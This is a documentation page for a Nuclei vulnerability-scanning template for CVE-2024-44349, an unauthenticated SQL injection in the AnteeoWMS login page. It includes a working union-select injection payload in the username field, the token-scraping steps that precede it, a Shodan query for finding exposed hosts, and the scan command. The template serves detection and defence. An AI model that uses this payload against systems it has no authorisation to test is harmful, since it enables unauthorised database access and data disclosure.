AnteeoWMS < v4.7.34 - SQL Injection
ID: CVE-2024-44349
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2024,sqli,anteeowms
Description
Section titled “Description”A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB.
YAML Source
Section titled “YAML Source”id: CVE-2024-44349
info: name: AnteeoWMS < v4.7.34 - SQL Injection author: iamnoooob,rootxharsh,pdresearch severity: critical description: | A SQL injection vulnerability in login portal in AnteeoWMS before v4.7.34 allows unauthenticated attackers to execute arbitrary SQL commands via the username parameter and disclosure of some data in the underlying DB. reference: - https://blog.cybergon.com/posts/cve-2024-44349/ - http://nvd.nist.gov/vuln/detail/CVE-2024-44349 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-44349 cwe-id: CWE-89 metadata: verified: true max-request: 2 shodan-query: html:"ANTEEO" tags: cve,cve2024,sqli,anteeowms
flow: http(1) && http(2)
http: - raw: - | GET /default.aspx HTTP/1.1 Host: {{Hostname}}
extractors: - type: regex part: body name: viewstate internal: true group: 1 regex: - 'id="__VIEWSTATE" value="([/a-zA-Z0-9+=]+?)"'
- type: regex part: body name: viewstategen internal: true group: 1 regex: - 'id="__VIEWSTATEGENERATOR" value="([A-Z0-9]+)"'
- type: regex part: body name: eventval internal: true group: 1 regex: - 'id="__EVENTVALIDATION" value="([/a-zA-Z0-9+=]+)"'
- raw: - | POST /default.aspx HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewstategen}}&ctl00%24MainContentPlaceHolder%24isCookieErased=&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthLogin=aa'union%20select+cast(@@version%20as%20int),null,null--%20-&ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel%24UsrAuthStr=&DXScript=1_10%2C1_11%2C1_22%2C1_62%2C1_12%2C1_13%2C1_179%2C1_180%2C1_20%2C1_21%2C1_186%2C1_14%2C1_16%2C1_182%2C1_189%2C1_40%2C1_178%2C1_47%2C1_8%2C1_37&DXCss=1_206%2C1_203%2C1_66%2C1_67%2C1_68%2C1_205%2C1_202%2C1_72%2C1_71%2C0_5551%2C0_5556%2C.%2FStyles%2Fwebstyle_02.css%2C0_5390%2C0_5394%2C0_768&__CALLBACKID=ctl00%24MainContentPlaceHolder%24ASPxCallbackPanel&__CALLBACKPARAM=c0%3A%5Bobject%20Object%5D&__EVENTVALIDATION={{urlencode(eventval)}}
matchers-condition: and matchers: - type: word part: body words: - 'Conversion failed when converting the nvarchar value 'Microsoft SQL Server'# digest: 4b0a00483046022100abade118a9fc53251c341b7b1c9b2060dbbbcd2dd4d0548ce92d5dc5c0b879eb022100ae8e978f143984f8d212b2f8fe5941f689bceeafd139614eae6e68217c0fe356:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-44349.yaml"